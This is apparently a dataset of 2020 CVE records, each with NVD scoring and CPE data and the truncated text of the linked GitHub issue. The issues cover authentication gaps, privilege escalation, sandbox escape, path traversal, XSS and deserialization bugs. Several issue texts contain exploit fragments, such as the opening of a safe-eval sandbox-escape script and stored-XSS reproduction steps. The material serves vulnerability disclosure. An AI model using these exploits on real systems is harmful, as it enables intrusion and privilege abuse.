{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@aliasrobotics.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/3316" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dronecode:micro_air_vehicle_link:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "F56CC677-E829-48A5-B01B-9B33F13C084B", "versionEndExcluding": null, "versionEndIncluding": null, "v...
[ "288" ]
288
https://github.com/aliasrobotics/RVD/issues/3316
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 3316 title: 'RVD#3316: No authentication in MAVLink protocol' type: vulnerability description: The Micro Air Vehicle Link (MAVLink) protocol presents no authentication mechanism on its version 1.0 (nor authorization) whichs leads to a variety of attacks including identity spoofing, unauthorized a...
RVD#3316: No authentication in MAVLink protocol
https://api.github.com/repos/aliasrobotics/RVD/issues/3316/comments
22
2020-06-30T17:20:40Z
2021-11-04T16:22:48Z
https://github.com/aliasrobotics/RVD/issues/3316
648,358,479
3,316
1,392
CVE-2020-24574
2020-08-21T04:15:10.787
The client (aka GalaxyClientService.exe) in GOG GALAXY through 2.0.41 (as of 12:58 AM Eastern, 9/26/21) allows local privilege escalation from any authenticated user to SYSTEM by instructing the Windows service to execute arbitrary commands. This occurs because the attacker can inject a DLL into GalaxyClient.exe, defea...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 6.9, "confidentialityImpact": "COMPL...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jtesta/gog_galaxy_client_service_poc" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jt...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gog:galaxy:*:*:*:*:*:windows:*:*", "matchCriteriaId": "5314B5BB-CE6A-4BD1-B9CE-ACA13D7A7349", "versionEndExcluding": null, "versionEndIncluding": "2.0.41", "versionStartExclu...
[ "798" ]
798
https://github.com/jtesta/gog_galaxy_client_service_poc/issues/1#issuecomment-926932218
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jtesta", "gog_galaxy_client_service_poc" ]
....Just in case anyone was wondering, the PoC still works on GOG Galaxy 2.0.35 (last tested as of time of wriitng this). Just compiled and tested it and was able to create a local user and add them to the local administrators group on a testbed system. GOG has yet to fix the underlying issue, it seems. CVE-2020-2...
PoC status update
https://api.github.com/repos/jtesta/gog_galaxy_client_service_poc/issues/1/comments
17
2021-01-22T23:22:15Z
2025-01-20T03:14:04Z
https://github.com/jtesta/gog_galaxy_client_service_poc/issues/1
792,366,903
1
1,393
CVE-2020-7710
2020-08-21T10:15:11.460
This affects all versions of package safe-eval. It is possible for an attacker to run an arbitrary command on the host machine.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hacksparrow/safe-eval/issues/19" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-SAFEEVAL-608076" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:safe-eval_project:safe-eval:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "40E74BFD-022E-4056-878F-0FA8BA26FDAB", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "94" ]
94
https://github.com/hacksparrow/safe-eval/issues/19
[ "Exploit", "Third Party Advisory" ]
github.com
[ "hacksparrow", "safe-eval" ]
The following script can lead to safe-eval sandbox escape (node `v12.13.0`): ```javascript const safeEval = require('safe-eval'); const theFunction = function() { const bad = new Error(); bad.__proto__ = null; bad.stack = { match(outer) { throw outer.constructor.constructor("return p...
Sandbox Escape
https://api.github.com/repos/hacksparrow/safe-eval/issues/19/comments
1
2020-02-28T07:50:28Z
2020-08-03T05:42:15Z
https://github.com/hacksparrow/safe-eval/issues/19
572,587,043
19
1,394
CVE-2020-10290
2020-08-21T15:15:12.540
Universal Robots controller execute URCaps (zip files containing Java-powered applications) without any permission restrictions and a wide API that presents many primitives that can compromise the overall robot operations as demonstrated in our video. In our PoC we demonstrate how a malicious actor could 'cook' a custo...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE",...
[ { "source": "cve@aliasrobotics.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/1495" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:sintef:urx:-:*:*:*:*:*:*:*", "matchCriteriaId": "D90D07FA-3643-4EBD-A0B3-7A5915E5216B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": nul...
[ "269" ]
269
https://github.com/aliasrobotics/RVD/issues/1495
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 1495 title: 'RVD#1495: Universal Robots URCaps execute with unbounded privileges' type: vulnerability description: Universal Robots controller execute URCaps (zip files containing Java-powered applications) without any permission restrictions and a wide API that presents many primitives that can c...
RVD#1495: Universal Robots URCaps execute with unbounded privileges
https://api.github.com/repos/aliasrobotics/RVD/issues/1495/comments
2
2020-04-03T15:49:12Z
2020-08-21T15:02:32Z
https://github.com/aliasrobotics/RVD/issues/1495
593,476,197
1,495
1,395
CVE-2020-7711
2020-08-23T14:15:09.573
This affects all versions of package github.com/russellhaering/goxmldsig. There is a crash on nil-pointer dereference caused by sending malformed XML signatures.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/russellhaering/goxmldsig/issues/48" }, { "source": "report@snyk.io", "tags": [ "Broken Link" ], "url": "https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERI...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:goxmldsig_project:goxmldsig:*:*:*:*:*:*:*:*", "matchCriteriaId": "A6E25D60-FAC6-4DD2-9AF6-5034CAB84901", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
[ "476" ]
476
https://github.com/russellhaering/goxmldsig/issues/48
[ "Exploit", "Third Party Advisory" ]
github.com
[ "russellhaering", "goxmldsig" ]
See https://github.com/russellhaering/gosaml2/issues/59 for background. Program which exhibits the issue: ```go package main import ( "crypto/x509" "encoding/base64" "encoding/xml" "fmt" "time" saml2 "github.com/russellhaering/gosaml2" "github.com/russellhaering/gosaml2/types" dsig "github.c...
Crash on nil-pointer dereference with malformed input
https://api.github.com/repos/russellhaering/goxmldsig/issues/48/comments
10
2019-08-14T10:53:49Z
2021-08-28T03:19:01Z
https://github.com/russellhaering/goxmldsig/issues/48
480,612,498
48
1,396
CVE-2020-14043
2020-08-24T16:15:10.640
** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** A Cross Side Request Forgery (CSRF) vulnerability was found in Codiad v1.7.8 and later. The request to download a plugin from the marketplace is only available to admin users and it isn't CSRF protected in components/market/controller.php. This might cause admins to make a vuln...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://advisory.checkmarx.net/advisory/CX-2020-4279" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Codiad/Codiad/blob/master/REA...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:codiad:codiad:*:*:*:*:*:*:*:*", "matchCriteriaId": "43C9171C-2531-46A0-9952-70E476FB6A46", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "352" ]
352
https://github.com/Codiad/Codiad/issues/1122
[ "Third Party Advisory" ]
github.com
[ "Codiad", "Codiad" ]
Hello, Our research team in Checkmarx found multiple vulnerabilities in Codiad (XSS, CSRF, SSRF, RCE), we tried to contact the top three maintainers and none of them are active. If there are any active developers on this project feel free to contact us for more information. ScaAppSec@checkmarx.com Best regards, Y...
Multiple vulnerabilities that can result in RCE
https://api.github.com/repos/Codiad/Codiad/issues/1122/comments
1
2020-06-03T15:02:11Z
2020-08-25T06:11:19Z
https://github.com/Codiad/Codiad/issues/1122
630,072,524
1,122
1,397
CVE-2020-7376
2020-08-24T19:15:10.713
The Metasploit Framework module "post/osx/gather/enum_osx module" is affected by a relative path traversal vulnerability in the get_keychains method which can be exploited to write arbitrary files to arbitrary locations on the host filesystem when the module is run on a malicious host.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10, "confidentialityImpact": "COMPLETE"...
[ { "source": "cve@rapid7.com", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/rapid7/metasploit-framework/issues/14008" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rapid7:metasploit:*:*:*:*:*:*:*:*", "matchCriteriaId": "AE440BD0-9B8F-49A8-BF37-85B8DC3CEDCB", "versionEndExcluding": "6.0.3", "versionEndIncluding": null, "versionStartExclu...
[ "22" ]
22
https://github.com/rapid7/metasploit-framework/issues/14008
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "rapid7", "metasploit-framework" ]
On the victim-soon-to-be-attacker host - create some fun executables : ``` root@linux-mint-19-3-amd64:/bin# ls -la /bin/cat* -rwxr-xr-x 1 root root 128 Aug 17 19:37 /bin/cat -rwxr-xr-x 1 root root 35064 Aug 17 19:17 /bin/cat.backup root@linux-mint-19-3-amd64:/bin# ls -la /usr/bin/sudo* -rwsr-xr-x 1 root roo...
post/osx/gather/enum_osx: permits remote command execution on Metasploit host
https://api.github.com/repos/rapid7/metasploit-framework/issues/14008/comments
4
2020-08-17T10:00:48Z
2020-08-21T15:06:10Z
https://github.com/rapid7/metasploit-framework/issues/14008
680,108,459
14,008
1,398
CVE-2020-7377
2020-08-24T19:15:10.837
The Metasploit Framework module "auxiliary/admin/http/telpho10_credential_dump" module is affected by a relative path traversal vulnerability in the untar method which can be exploited to write arbitrary files to arbitrary locations on the host file system when the module is run on a malicious HTTP server.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@rapid7.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/rapid7/metasploit-framework/issues/14015" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rapid7:metasploit:*:*:*:*:*:*:*:*", "matchCriteriaId": "A6C57088-B29C-4383-BC60-42ECE0C9326C", "versionEndExcluding": "6.0.3", "versionEndIncluding": null, "versionStartExclu...
[ "22" ]
22
https://github.com/rapid7/metasploit-framework/issues/14015
[ "Exploit", "Third Party Advisory" ]
github.com
[ "rapid7", "metasploit-framework" ]
The `untar` method in the `auxiliary/admin/http/telpho10_credential_dump` module is vulnerable to directory traversal resulting in arbitrary file write. This can be used to achieve remote command execution on the Metasploit host from a remote malicious webserver masquerading as a Telpho10 system. # Vulnerable Cod...
auxiliary/admin/http/telpho10_credential_dump: `untar` method is vulnerable to directory traversal resulting in arbitrary file write on the Metasploit host
https://api.github.com/repos/rapid7/metasploit-framework/issues/14015/comments
3
2020-08-18T08:48:55Z
2020-08-25T13:35:54Z
https://github.com/rapid7/metasploit-framework/issues/14015
680,816,703
14,015
1,399
CVE-2020-24616
2020-08-25T18:15:11.133
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2814" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "8395437B-348F-4291-B79B-2794C1A0B560", "versionEndExcluding": "2.9.10.6", "versionEndIncluding": null, "versi...
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2814
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another gadget type(s) reported regarding class(es) of `br.com.anteros:Anteros-DBCP` library. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Mitre id: CVE-2020-24616 Reporter(s): ChenZhaojun (Security Team of Aliba...
Block one more gadget type (Anteros-DBCP, CVE-2020-24616)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2814/comments
2
2020-08-11T02:05:43Z
2020-12-02T03:57:22Z
https://github.com/FasterXML/jackson-databind/issues/2814
676,524,402
2,814
1,400
CVE-2020-16197
2020-08-25T19:15:12.500
An issue was discovered in Octopus Deploy 3.4. A deployment target can be configured with an Account or Certificate that is outside the scope of the deployment target. An authorised user can potentially use a certificate that they are not in scope to use. An authorised user is also able to obtain certificate metadata b...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6529" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6530" }, { ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:octopus:octopus_server:3.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "9A1A66B5-9F14-49CE-95D6-A64A6D4EDE72", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "295" ]
295
https://github.com/OctopusDeploy/Issues/issues/6529
[ "Third Party Advisory" ]
github.com
[ "OctopusDeploy", "Issues" ]
[CVE-2020-16197](https://nvd.nist.gov/vuln/detail/CVE-2020-16197) ## Description A credential scoped to one tenant could be used to affect another tenant in certain circumstances. Effectively, the logic was previously, "A credential may be used to access this target if it is applicable to any tenant on this ta...
Certificates and accounts associated with tenanted deployment targets are not validated
https://api.github.com/repos/OctopusDeploy/Issues/issues/6529/comments
0
2020-08-23T12:21:15Z
2022-01-19T01:01:09Z
https://github.com/OctopusDeploy/Issues/issues/6529
684,173,453
6,529
1,401
CVE-2020-16197
2020-08-25T19:15:12.500
An issue was discovered in Octopus Deploy 3.4. A deployment target can be configured with an Account or Certificate that is outside the scope of the deployment target. An authorised user can potentially use a certificate that they are not in scope to use. An authorised user is also able to obtain certificate metadata b...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6529" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6530" }, { ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:octopus:octopus_server:3.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "9A1A66B5-9F14-49CE-95D6-A64A6D4EDE72", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "295" ]
295
https://github.com/OctopusDeploy/Issues/issues/6530
[ "Third Party Advisory" ]
github.com
[ "OctopusDeploy", "Issues" ]
This is the 2020.2.18 version of https://github.com/OctopusDeploy/Issues/issues/6529 [CVE-2020-16197](https://nvd.nist.gov/vuln/detail/CVE-2020-16197) ## Description A credential scoped to one tenant could be used to affect another tenant in certain circumstances. Effectively, the logic was previously, "A c...
Certificates and accounts associated with tenanted deployment targets are not validated
https://api.github.com/repos/OctopusDeploy/Issues/issues/6530/comments
0
2020-08-23T12:30:12Z
2022-01-19T01:01:57Z
https://github.com/OctopusDeploy/Issues/issues/6530
684,174,811
6,530
1,402
CVE-2020-16197
2020-08-25T19:15:12.500
An issue was discovered in Octopus Deploy 3.4. A deployment target can be configured with an Account or Certificate that is outside the scope of the deployment target. An authorised user can potentially use a certificate that they are not in scope to use. An authorised user is also able to obtain certificate metadata b...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6529" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6530" }, { ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:octopus:octopus_server:3.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "9A1A66B5-9F14-49CE-95D6-A64A6D4EDE72", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "295" ]
295
https://github.com/OctopusDeploy/Issues/issues/6531
[ "Third Party Advisory" ]
github.com
[ "OctopusDeploy", "Issues" ]
This is the 2020.1.22 version of https://github.com/OctopusDeploy/Issues/issues/6529 [CVE-2020-16197](https://nvd.nist.gov/vuln/detail/CVE-2020-16197) ## Description A credential scoped to one tenant could be used to affect another tenant in certain circumstances. Effectively, the logic was previously, "A c...
Certificates and accounts associated with tenanted deployment targets are not validated
https://api.github.com/repos/OctopusDeploy/Issues/issues/6531/comments
0
2020-08-23T12:31:17Z
2020-08-26T22:46:20Z
https://github.com/OctopusDeploy/Issues/issues/6531
684,174,965
6,531
1,403
CVE-2020-19005
2020-08-25T22:15:11.537
zrlog v2.1.0 has a vulnerability with the permission check. If admin account is logged in, other unauthorized users can download the database backup file directly.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "PARTIAL"...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/commit/b2b4415e2e59b6f18b0a62b633e71c96d63c43ba" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zrlog:zrlog:2.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9405174E-51EC-48F0-BF91-16021060B7FE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "863" ]
863
https://github.com/94fzb/zrlog/issues/48
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "94fzb", "zrlog" ]
1、There is a vulnerability with the permission check。If admin account is logged in, other unauthorized users can download the database backup file directly。The getuser() function always gets the value PluginHandler.java <img width="1048" alt="101" src="https://user-images.githubusercontent.com/25348551/55862980-300...
Unauthorized access to download database backup files
https://api.github.com/repos/94fzb/zrlog/issues/48/comments
3
2019-04-07T11:14:36Z
2019-04-14T01:34:27Z
https://github.com/94fzb/zrlog/issues/48
430,132,232
48
1,404
CVE-2020-19007
2020-08-26T14:15:10.637
Halo blog 1.2.0 allows users to submit comments on blog posts via /api/content/posts/comments. The javascript code supplied by the attacker will then execute in the victim user's browser.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/547" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "DB3E9501-E452-4B2A-AD4A-D803C8A9C40C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "79" ]
79
https://github.com/halo-dev/halo/issues/547
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 你好!感谢你正在考虑为 Halo 提交一个 bug。请花一点点时间尽量详细地回答以下基础问题。 谢谢! --> <!-- 请确认你已经做了下面这些事情,若 bug 还是未解决,那么请尽可详细地描述你的问题。 - 我已经安装了最新版的 Halo - 我已经搜索了已有的 Issues 列表中有关的信息 - 我已经搜索了论坛中有关的信息:https://bbs.halo.run - 我已经阅读了 Halo 的 FAQ:https://halo.run/archives/other-faq --> ## Environment Server Version:1....
Stored xss on Halo blog
https://api.github.com/repos/halo-dev/halo/issues/547/comments
2
2020-02-08T08:43:59Z
2020-03-16T09:15:11Z
https://github.com/halo-dev/halo/issues/547
561,990,601
547
1,405
CVE-2020-23654
2020-08-26T17:15:12.693
NavigateCMS 2.9 is affected by Cross Site Scripting (XSS) via the module "Shop."
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https:/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:naviwebs:navigatecms:2.9:*:*:*:*:*:*:*", "matchCriteriaId": "54FE5CDA-77C7-441D-A61C-FF8171A1DF30", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "79" ]
79
https://github.com/NavigateCMS/Navigate-CMS/issues/10
[ "Exploit", "Third Party Advisory" ]
github.com
[ "NavigateCMS", "Navigate-CMS" ]
**/**Describe the bug**/** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Shop" feature Navigate **/**To Reproduce**/** Steps to reproduce the behavior: 1. Login into the panel 2. Go to 'navigate/navigate.php?fid=dashboard' 3. Go to Moudle "Shop" 4. Chose: - Go to ...
Cross Site Script Vulnerability on module "Shop" in NavigateCMS 2.9
https://api.github.com/repos/NavigateCMS/Navigate-CMS/issues/10/comments
2
2020-06-17T14:24:49Z
2020-06-18T08:07:07Z
https://github.com/NavigateCMS/Navigate-CMS/issues/10
640,486,199
10
1,406
CVE-2020-23655
2020-08-26T17:15:12.770
NavigateCMS 2.9 is affected by Cross Site Scripting (XSS) on module "Configuration."
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https:/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:naviwebs:navigatecms:2.9:*:*:*:*:*:*:*", "matchCriteriaId": "54FE5CDA-77C7-441D-A61C-FF8171A1DF30", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "79" ]
79
https://github.com/NavigateCMS/Navigate-CMS/issues/11
[ "Exploit", "Third Party Advisory" ]
github.com
[ "NavigateCMS", "Navigate-CMS" ]
**/Describe the bug/** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Configuration" feature Navigate **/To Reproduce/** Steps to reproduce the behavior: 1. Login into the panel 2. Go to '/navigate/navigate.php?fid=about' 3. Go to Moudle "Configuration" 4. Chose: -...
Cross Site Script Vulnerability on module "Configuration" in NavigateCMS 2.9
https://api.github.com/repos/NavigateCMS/Navigate-CMS/issues/11/comments
2
2020-06-17T14:57:52Z
2020-06-18T08:07:44Z
https://github.com/NavigateCMS/Navigate-CMS/issues/11
640,511,844
11
1,407
CVE-2020-23656
2020-08-26T17:15:12.833
NavigateCMS 2.9 is affected by Cross Site Scripting (XSS) on module "Content."
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https:/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:naviwebs:navigatecms:2.9:*:*:*:*:*:*:*", "matchCriteriaId": "54FE5CDA-77C7-441D-A61C-FF8171A1DF30", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "79" ]
79
https://github.com/NavigateCMS/Navigate-CMS/issues/12
[ "Exploit", "Third Party Advisory" ]
github.com
[ "NavigateCMS", "Navigate-CMS" ]
**/Describe the bug/** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Content" feature Navigate **/To Reproduce/** Steps to reproduce the behavior: 1. Login into the panel 2. Go to 'navigate/navigate.php?fid=dashboard' 3. Go to Moudle "Content" 4. Chose: - Go to "/...
Cross Site Script Vulnerability on module "Content" in NavigateCMS 2.9
https://api.github.com/repos/NavigateCMS/Navigate-CMS/issues/12/comments
2
2020-06-17T15:28:13Z
2020-06-18T09:46:57Z
https://github.com/NavigateCMS/Navigate-CMS/issues/12
640,536,183
12
1,408
CVE-2020-15158
2020-08-26T18:15:10.287
In libIEC61850 before version 1.4.3, when a message with COTP message length field with value < 4 is received an integer underflow will happen leading to heap buffer overflow. This can cause an application crash or on some platforms even the execution of remote code. If your application is used in open networks or ther...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mz-automation/libiec61850/commit/033ab5b6488250c8c3b838f25a7cbc3e099230bb" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advis...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mz-automation:libiec61850:*:*:*:*:*:*:*:*", "matchCriteriaId": "1E993B84-2A79-45F0-BF40-4AF97ACF6F3D", "versionEndExcluding": "1.4.3", "versionEndIncluding": null, "versionSt...
[ "191" ]
191
https://github.com/mz-automation/libiec61850/issues/250
[ "Third Party Advisory" ]
github.com
[ "mz-automation", "libiec61850" ]
COTP message is size field set to zero can cause invalid memory access.
Possible heap buffer overflow when COTP message with invalid size is received
https://api.github.com/repos/mz-automation/libiec61850/issues/250/comments
2
